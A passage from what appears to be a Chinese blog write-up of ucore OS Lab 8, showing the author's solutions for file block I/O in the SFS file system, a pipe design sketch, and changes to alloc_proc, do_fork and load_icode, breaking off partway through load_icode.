class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*  </span></span><br><span class="line"><span class="comment"> * sfs_io_nolock - Rd/Wr a file contentfrom offset position to offset+ length  disk blocks&lt;--&gt;buffer (in memroy)</span></span><br><span class="line"><span class="comment"> * @sfs:      sfs file system</span></span><br><span class="line"><span class="comment"> * @sin:      sfs inode in memory</span></span><br><span class="line"><span class="comment"> * @buf:      the buffer Rd/Wr</span></span><br><span class="line"><span class="comment"> * @offset:   the offset of file</span></span><br><span class="line"><span class="comment"> * @alenp:    the length need to read (is a pointer). and will RETURN the really Rd/Wr lenght</span></span><br><span class="line"><span class="comment"> * @write:    BOOL, 0 read, 1 write</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">sfs_io_nolock</span><span class="params">(<span class="keyword">struct</span> sfs_fs *sfs, <span class="keyword">struct</span> sfs_inode *sin, <span class="type">void</span> *buf, <span class="type">off_t</span> offset, <span class="type">size_t</span> *alenp, <span class="type">bool</span> write)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">sfs_disk_inode</span> *din = sin-&gt;din;</span><br><span class="line">    <span class="built_in">assert</span>(din-&gt;type != SFS_TYPE_DIR);</span><br><span class="line">  <span class="comment">// calculate the Rd/Wr end position</span></span><br><span class="line">    <span class="comment">// 计算缓冲区读取/写入的终止位置</span></span><br><span class="line">    <span class="type">off_t</span> endpos = offset + *alenp, blkoff;</span><br><span class="line">    *alenp = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">if</span> (offset &lt; <span class="number">0</span> || offset &gt;= SFS_MAX_FILE_SIZE || offset &gt; endpos)</span><br><span class="line">        <span class="keyword">return</span> -E_INVAL;</span><br><span class="line">    <span class="comment">// 如果偏移与终止位置相同，及欲读取/写入0字节的数据</span></span><br><span class="line">    <span class="keyword">if</span> (offset == endpos) &#123;</span><br><span class="line">        <span class="comment">// 直接返回</span></span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (endpos &gt; SFS_MAX_FILE_SIZE)</span><br><span class="line">        endpos = SFS_MAX_FILE_SIZE;</span><br><span class="line">    <span class="keyword">if</span> (!write) &#123;</span><br><span class="line">        <span class="comment">// 如果是读取数据，并冲区中剩余的数据超出一个硬盘节点的数据大小</span></span><br><span class="line">        <span class="keyword">if</span> (offset &gt;= din-&gt;size) &#123;</span><br><span class="line">            <span class="comment">// 直接返回，读取失败</span></span><br><span class="line">            <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span> (endpos &gt; din-&gt;size)</span><br><span class="line">            endpos = din-&gt;size;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 根据不同的执行函数，设置对应的函数指针</span></span><br><span class="line">    <span class="built_in">int</span> (*sfs_buf_op)(<span class="keyword">struct</span> sfs_fs *sfs, <span class="type">void</span> *buf, <span class="type">size_t</span> len, <span class="type">uint32_t</span> blkno, <span class="type">off_t</span> offset);</span><br><span class="line">    <span class="built_in">int</span> (*sfs_block_op)(<span class="keyword">struct</span> sfs_fs *sfs, <span class="type">void</span> *buf, <span class="type">uint32_t</span> blkno, <span class="type">uint32_t</span> nblks);</span><br><span class="line">    <span class="keyword">if</span> (write)</span><br><span class="line">        sfs_buf_op = sfs_wbuf, sfs_block_op = sfs_wblock;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">        sfs_buf_op = sfs_rbuf, sfs_block_op = sfs_rblock;</span><br><span class="line"></span><br><span class="line">    <span class="type">int</span> ret = <span class="number">0</span>;</span><br><span class="line">    <span class="type">size_t</span> size, alen = <span class="number">0</span>;</span><br><span class="line">    <span class="type">uint32_t</span> ino;</span><br><span class="line">    <span class="type">uint32_t</span> blkno = offset / SFS_BLKSIZE;          <span class="comment">// The NO. of Rd/Wr begin block</span></span><br><span class="line">    <span class="type">uint32_t</span> nblks = endpos / SFS_BLKSIZE - blkno;  <span class="comment">// The size of Rd/Wr blocks</span></span><br><span class="line"></span><br><span class="line">  <span class="comment">//LAB8:EXERCISE1 YOUR CODE HINT: call sfs_bmap_load_nolock, sfs_rbuf, sfs_rblock,etc. read different kind of blocks in file</span></span><br><span class="line">  <span class="comment">/*</span></span><br><span class="line"><span class="comment">   * (1) If offset isn&#x27;t aligned with the first block, Rd/Wr some content from offset to the end of the first block</span></span><br><span class="line"><span class="comment">   *       NOTICE: useful function: sfs_bmap_load_nolock, sfs_buf_op</span></span><br><span class="line"><span class="comment">   *               Rd/Wr size = (nblks != 0) ? (SFS_BLKSIZE - blkoff) : (endpos - offset)</span></span><br><span class="line"><span class="comment">   * (2) Rd/Wr aligned blocks</span></span><br><span class="line"><span class="comment">   *       NOTICE: useful function: sfs_bmap_load_nolock, sfs_block_op</span></span><br><span class="line"><span class="comment">     * (3) If end position isn&#x27;t aligned with the last block, Rd/Wr some content from begin to the (endpos % SFS_BLKSIZE) of the last block</span></span><br><span class="line"><span class="comment">   *       NOTICE: useful function: sfs_bmap_load_nolock, sfs_buf_op</span></span><br><span class="line"><span class="comment">  */</span></span><br><span class="line">    <span class="comment">// 对齐偏移。如果偏移没有对齐第一个基础块，则多读取/写入第一个基础块的末尾数据</span></span><br><span class="line">    <span class="keyword">if</span> ((blkoff = offset % SFS_BLKSIZE) != <span class="number">0</span>) &#123;</span><br><span class="line">        size = (nblks != <span class="number">0</span>) ? (SFS_BLKSIZE - blkoff) : (endpos - offset);</span><br><span class="line">        <span class="comment">// 获取第一个基础块所对应的block的编号`ino`</span></span><br><span class="line">        <span class="keyword">if</span> ((ret = <span class="built_in">sfs_bmap_load_nolock</span>(sfs, sin, blkno, &amp;ino)) != <span class="number">0</span>)</span><br><span class="line">            <span class="keyword">goto</span> out;</span><br><span class="line">        <span class="comment">// 通过上一步取出的`ino`，读取/写入一部分第一个基础块的末尾数据</span></span><br><span class="line">        <span class="keyword">if</span> ((ret = <span class="built_in">sfs_buf_op</span>(sfs, buf, size, ino, blkoff)) != <span class="number">0</span>)</span><br><span class="line">            <span class="keyword">goto</span> out;</span><br><span class="line">        alen += size;</span><br><span class="line">        <span class="keyword">if</span> (nblks == <span class="number">0</span>)</span><br><span class="line">            <span class="keyword">goto</span> out;</span><br><span class="line">        buf += size, blkno ++, nblks --;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 循环读取/写入对齐好的数据</span></span><br><span class="line">    size = SFS_BLKSIZE;</span><br><span class="line">    <span class="keyword">while</span> (nblks != <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="comment">// 获取inode对应的基础块编号</span></span><br><span class="line">        <span class="keyword">if</span> ((ret = <span class="built_in">sfs_bmap_load_nolock</span>(sfs, sin, blkno, &amp;ino)) != <span class="number">0</span>)</span><br><span class="line">            <span class="keyword">goto</span> out;</span><br><span class="line">        <span class="comment">// 单次读取/写入一基础块的数据</span></span><br><span class="line">        <span class="keyword">if</span> ((ret = <span class="built_in">sfs_block_op</span>(sfs, buf, ino, <span class="number">1</span>)) != <span class="number">0</span>)</span><br><span class="line">            <span class="keyword">goto</span> out;</span><br><span class="line">        alen += size, buf += size, blkno ++, nblks --;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 如果末尾位置没有与最后一个基础块对齐，则多读取/写入一点末尾基础块的数据</span></span><br><span class="line">    <span class="keyword">if</span> ((size = endpos % SFS_BLKSIZE) != <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="keyword">if</span> ((ret = <span class="built_in">sfs_bmap_load_nolock</span>(sfs, sin, blkno, &amp;ino)) != <span class="number">0</span>)</span><br><span class="line">            <span class="keyword">goto</span> out;</span><br><span class="line">        <span class="keyword">if</span> ((ret = <span class="built_in">sfs_buf_op</span>(sfs, buf, size, ino, <span class="number">0</span>)) != <span class="number">0</span>)</span><br><span class="line">            <span class="keyword">goto</span> out;</span><br><span class="line">        alen += size;</span><br><span class="line">    &#125;</span><br><span class="line">out:</span><br><span class="line">    *alenp = alen;</span><br><span class="line">    <span class="keyword">if</span> (offset + alen &gt; sin-&gt;din-&gt;size) &#123;</span><br><span class="line">        sin-&gt;din-&gt;size = offset + alen;</span><br><span class="line">        sin-&gt;dirty = <span class="number">1</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> ret;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><blockquote><p>给出设计实现”UNIX的PIPE机制“的概要设方案</p></blockquote><ul><li>PIPE管道机制是进程间通信的较为重要的一种方式。在VFS中，最简单的做法就是在磁盘上建立一块pipe缓冲文件<code>pipe_tmp</code>。之后，当打开了<code>pipe_tmp</code>文件的某进程fork出子进程后，父子进程就可以通过读写同一文件来实现进程间通信。</li><li>但实际上，上述的进程间通信是十分低效的，因为需要调用多个函数来完成文件读写，同时硬盘的读写速率也远远小于内存。由于用户与实际的文件系统间由虚拟文件系统VFS调控，因此我们可以在内存中根据文件系统规范，建立虚拟pipe缓冲区域文件来代替磁盘上的缓冲文件，这样便可大大提高通信速率。</li></ul><h3 id="2-练习2">2) 练习2</h3><blockquote><p><strong>完成基于文件系统的执行程序机制的实现</strong></p></blockquote><p>基于文件系统的执行程序机制，有几部分地方需要添加代码，分别是<code>alloc_proc</code>、<code>do_fork</code>、<code>load_icode</code>三个函数。</p><ul><li><p><code>alloc_proc</code></p><ul><li><p>这个函数需要添加的内容最少，只需多补充一个<code>struct files_struct *filesp</code>的初始化即可</p></li><li><p>修改后的源码如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">static</span> <span class="keyword">struct</span> <span class="title class_">proc_struct</span> *</span><br><span class="line"><span class="built_in">alloc_proc</span>(<span class="type">void</span>) &#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">proc_struct</span> *proc = <span class="built_in">kmalloc</span>(<span class="built_in">sizeof</span>(<span class="keyword">struct</span> proc_struct));</span><br><span class="line">    <span class="keyword">if</span> (proc != <span class="literal">NULL</span>) &#123;</span><br><span class="line">        <span class="comment">// Lab7内容</span></span><br><span class="line">        <span class="comment">// ...</span></span><br><span class="line"></span><br><span class="line">        <span class="comment">//LAB8:EXERCISE2 YOUR CODE HINT:need add some code to init fs in proc_struct, ...</span></span><br><span class="line">        <span class="comment">// LAB8 添加一个filesp指针的初始化</span></span><br><span class="line">        proc-&gt;filesp = <span class="literal">NULL</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> proc;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul></li><li><p><code>do_fork</code></p><ul><li><p>fork机制在原先lab7的基础上，多了<code>file_struct</code>结构的复制操作与执行失败时的重置操作。</p><p>这两部操作分别需要调用<code>copy_files</code>和<code>put_files</code>函数</p></li><li><p>修改后的源码如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">do_fork</span><span class="params">(<span class="type">uint32_t</span> clone_flags, <span class="type">uintptr_t</span> stack, <span class="keyword">struct</span> trapframe *tf)</span> </span>&#123;</span><br><span class="line">    <span class="type">int</span> ret = -E_NO_FREE_PROC;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">proc_struct</span> *proc;</span><br><span class="line">    <span class="keyword">if</span> (nr_process &gt;= MAX_PROCESS) &#123;</span><br><span class="line">        <span class="keyword">goto</span> fork_out;</span><br><span class="line">    &#125;</span><br><span class="line">    ret = -E_NO_MEM;</span><br><span class="line">    <span class="keyword">if</span> ((proc = <span class="built_in">alloc_proc</span>()) == <span class="literal">NULL</span>) &#123;</span><br><span class="line">        <span class="keyword">goto</span> fork_out;</span><br><span class="line">    &#125;</span><br><span class="line">    proc-&gt;parent = current;</span><br><span class="line">    <span class="built_in">assert</span>(current-&gt;wait_state == <span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">setup_kstack</span>(proc) != <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="keyword">goto</span> bad_fork_cleanup_proc;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">//LAB8:EXERCISE2 YOUR CODE  HINT:how to copy the fs in parent&#x27;s proc_struct?</span></span><br><span class="line">    <span class="comment">// LAB8 将当前进程的fs复制到fork出的进程中</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">copy_files</span>(clone_flags, proc) != <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="keyword">goto</span> bad_fork_cleanup_kstack;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">copy_mm</span>(clone_flags, proc) != <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="keyword">goto</span> bad_fork_cleanup_fs;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">copy_thread</span>(proc, stack, tf);</span><br><span class="line"></span><br><span class="line">    <span class="type">bool</span> intr_flag;</span><br><span class="line">    <span class="built_in">local_intr_save</span>(intr_flag);</span><br><span class="line">    &#123;</span><br><span class="line">        proc-&gt;pid = <span class="built_in">get_pid</span>();</span><br><span class="line">        <span class="built_in">hash_proc</span>(proc);</span><br><span class="line">        <span class="built_in">set_links</span>(proc);</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">local_intr_restore</span>(intr_flag);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">wakeup_proc</span>(proc);</span><br><span class="line"></span><br><span class="line">    ret = proc-&gt;pid;</span><br><span class="line">fork_out:</span><br><span class="line">    <span class="keyword">return</span> ret;</span><br><span class="line">  <span class="comment">// LAB8 如果复制失败，则需要重置原先的操作</span></span><br><span class="line">bad_fork_cleanup_fs:  <span class="comment">//for LAB8</span></span><br><span class="line">    <span class="built_in">put_files</span>(proc);</span><br><span class="line">bad_fork_cleanup_kstack:</span><br><span class="line">    <span class="built_in">put_kstack</span>(proc);</span><br><span class="line">bad_fork_cleanup_proc:</span><br><span class="line">    <span class="built_in">kfree</span>(proc);</span><br><span class="line">    <span class="keyword">goto</span> fork_out;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul></li><li><p><code>load_icode</code>函数可以在lab7原先的基础上进行修改，不需要从0开发。</p><ul><li><p>原先lab7源码中，读取可执行文件是直接读取内存的，但在这里需要使用函数<code>load_icode_read</code>来从文件系统中读取<code>ELF header</code>以及各个段的数据。</p></li><li><p>原先Lab7的<code>load_icode</code>函数中并没有对<code>execve</code>所执行的程序传入参数，而我们需要在lab8中补充这个实现。</p></li><li><p>补充后的源码如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// load_icode -  called by sys_exec--&gt;do_execve</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">load_icode</span><span class="params">(<span class="type">int</span> fd, <span class="type">int</span> argc, <span class="type">char</span> **kargv)</span> </span>&#123;</span><br><span class="line">    <span class="comment">/* LAB8:EXERCISE2 YOUR CODE  HINT:how to load the file with handler fd  in to process&#x27;s memory? how to setup argc/argv?</span></span><br><span class="line"><span class="comment">     * MACROs or Functions:</span></span><br><span class="line"><span class="comment">     *  mm_create        - create a mm</span></span><br><span class="line"><span class="comment">     *  setup_pgdir      - setup pgdir in mm</span></span><br><span class="line"><span class="comment">     *  load_icode_read  - read raw data content of program file</span></span><br><span class="line"><span class="comment">     *  mm_map           - build new vma</span></span><br><span class="line"><span class="comment">     *  pgdir_alloc_page - allocate new memory for  TEXT/DATA/BSS/stack parts</span></span><br><span class="line"><span class="comment">     *  lcr3             - update Page Directory Addr Register -- CR3</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">  <span class="comment">/* (1) create a new mm for current process</span></span><br><span class="line"><span class="comment">     * (2) create a new PDT, and mm-&gt;pgdir= kernel virtual addr of PDT</span></span><br><span class="line"><span class="comment">     * (3) copy TEXT/DATA/BSS parts in binary to memory space of process</span></span><br><span class="line"><span class="comment">     *    (3.1) read raw data content in file and resolve elfhdr</span></span><br><span class="line"><span class="comment">     *    (3.2) read raw data content in file and resolve proghdr based on info in elfhdr</span></span><br><span class="line"><span class="comment">     *    (3.3) call mm_map to build vma related to TEXT/DATA</span></span><br><span class="line"><span class="comment">     *    (3.4) callpgdir_alloc_page to allocate page for TEXT/DATA, read contents in file</span></span><br><span class="line"><span class="comment">     *          and copy them into the new allocated pages</span></span><br><span class="line"><span class="comment">     *    (3.5) callpgdir_alloc_page to allocate pages for BSS, memset zero in these pages</span></span><br><span class="line"><span class="comment">     * (4) call mm_map to setup user stack, and put parameters into user stack</span></span><br><span class="line"><span class="comment">     * (5) setup current process&#x27;s mm, cr3, reset pgidr (using lcr3 MARCO)</span></span><br><span class="line"><span class="comment">     * (6) setup uargc and uargv in user stacks</span></span><br><span class="line"><span class="comment">     * (7) setup trapframe for user environment</span></span><br><span class="line"><span class="comment">     * (8) if up steps failed, you should cleanup the env.</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="built_in">assert</span>(argc &gt;= <span class="number">0</span> &amp;&amp; argc &lt;= EXEC_MAX_ARG_NUM);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (current-&gt;mm != <span class="literal">NULL</span>) &#123;</span><br><span class="line">        <span class="built_in">panic</span>(<span class="string">&quot;load_icode: current-&gt;mm must be empty.\n&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="type">int</span> ret = -E_NO_MEM;</span><br><span class="line">    <span class="comment">// 创建proc的内存管理结构</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">mm_struct</span> *mm;</span><br><span class="line">    <span class="keyword">if</span> ((mm = <span class="built_in">mm_create</span>()) == <span class="literal">NULL</span>) &#123;</span><br><span class="line">        <span class="keyword">goto</span> bad_mm;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">setup_pgdir</span>(mm) != <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="keyword">goto</span> bad_pgdir_cleanup_mm;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">Page</span> *page;</span><br><span class="line">    <span class="comment">// LAB8 这里要从文件中读取ELF header，而不是Lab7中的内存了</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">elfhdr</span> __elf, *elf = &amp;__elf;</span><br><span class="line">    <span class="keyword">if</span> ((ret = <span class="built_in">load_icode_read</span>(fd, elf, <span class="built_in">sizeof</span>(<span class="keyword">struct</span> elfhdr), <span class="number">0</span>)) != <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="keyword">goto</span> bad_elf_cleanup_pgdir;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 判断读取入的elf header是否正确</span></span><br><span class="line">    <span class="keyword">if</span> (elf-&gt;e_magic != ELF_MAGIC) &#123;</span><br><span class="line">        ret = -E_INVAL_ELF;</span><br><span class="line">        <span class="keyword">goto</span> bad_elf_cleanup_pgdir;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 根据每一段的大小和基地址来分配不同的内存空间</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">proghdr</span> __ph, *ph = &amp;__ph;</span><br><span class="line">    <span class="type">uint32_t</span> vm_flags, perm, phnum;</span><br><span class="line">    <span class="keyword">for</span> (phnum = <span class="number">0</span>; phnum &lt; elf-&gt;e_phnum; phnum ++) &#123;</span><br><span class="line">        <span class="comment">// LAB8 从文件特定偏移处读取每个段的详细信息（包括大小、基地址等等）</span></span><br><span class="line">        <span class="type">off_t</span> phoff = elf-&gt;e_phoff + <span class="built_in">sizeof</span>(<span class="keyword">struct</span> proghdr) * phnum;</span><br><span class="line">        <span class="keyword">if</span> ((ret = <span class="built_in">load_icode_read</span>(fd, ph, <span class="built_in">sizeof</span>(<span class="keyword">struct</span> proghdr), phoff)) != <span class="number">0</span>) &#123;</span><br><span class="line">            <span class="keyword">goto</span> bad_cleanup_mmap;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span> (ph-&gt;p_type != ELF_PT_LOAD) &#123;</span><br><span class="line">            <span class="keyword">continue</span> ;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span> (ph-&gt;p_filesz &gt; ph-&gt;p_memsz) &#123;</span><br><span class="line">            ret = -E_INVAL_ELF;</span><br><span class="line">            <span class="keyword">goto</span> bad_cleanup_mmap;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span> (ph-&gt;p_filesz == <span class="number">0</span>) &#123;</span><br><span class="line">            <span class="keyword">continue</span> ;</span><br><span class="line">        &#125;</span><br><span class="line">        vm_flags = <span class="number">0</span>, perm = PTE_U;</span><br><span class="line">        <span class="keyword">if</span> (ph-&gt;p_flags &amp; ELF_PF_X) vm_flags |= VM_EXEC;</span><br><span class="line">        <span class="keyword">if</span> (ph-&gt;p_flags &amp; ELF_PF_W) vm_flags |= VM_WRITE;</span><br><span class="line">        <span class="keyword">if</span> (ph-&gt;p_flags &amp; ELF_PF_R) vm_flags |= VM_READ;</span><br><span class="line">        <span class="keyword">if</span> (vm_flags &amp; VM_WRITE) perm |= PTE_W;</span><br><span class="line">        <span class="comment">// 为当前段分配内存空间</span></span><br><span class="line">        <span class="keyword">if</span> ((ret = <span class="built_in">mm_map</span>(mm, ph-&gt;p_va, ph-&gt;p_memsz, vm_flags, <span class="literal">NULL</span>)) != <span class="number">0</span>) &#123;</span><br><span class="line">            <span class="keyword">goto</span> bad_cleanup_mmap;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="type">off_t</span> offset = ph-&gt;p_offset;</span><br><span class="line">        <span class="type">size_t</span> off, size;</span><br><span class="line">        <span class="type">uintptr_t</span> start = ph-&gt;p_va, end, la = <span 